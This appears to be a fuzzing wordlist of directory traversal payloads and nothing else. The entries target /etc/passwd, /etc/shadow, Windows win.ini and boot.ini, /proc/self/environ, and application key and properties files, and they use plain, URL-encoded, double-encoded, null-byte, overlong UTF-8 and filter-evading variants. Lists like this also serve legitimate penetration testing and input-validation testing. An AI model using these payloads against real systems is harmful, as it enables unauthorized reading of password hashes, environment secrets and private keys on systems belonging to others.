../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd

..\windows\win.ini
..\..\windows\win.ini
..\boot.ini

..%2fetc%2fpasswd
..%2F..%2Fetc%2Fpasswd
%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd

..%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd

../etc/passwd%00
../etc/passwd%00.jpg

..%c0%afetc%c0%afpasswd
..%ef%bc%8fetc%ef%bc%8fpasswd
%c0%ae%c0%ae/etc/passwd

....//etc/passwd
....\/etc/passwd
..././etc/passwd
..%5c..%5cetc%5cpasswd

/etc/passwd
/etc/shadow
/proc/self/environ
/proc/self/cmdline

../keys/key2
../../keys/key1
../application.properties
../../src/main/resources/application.properties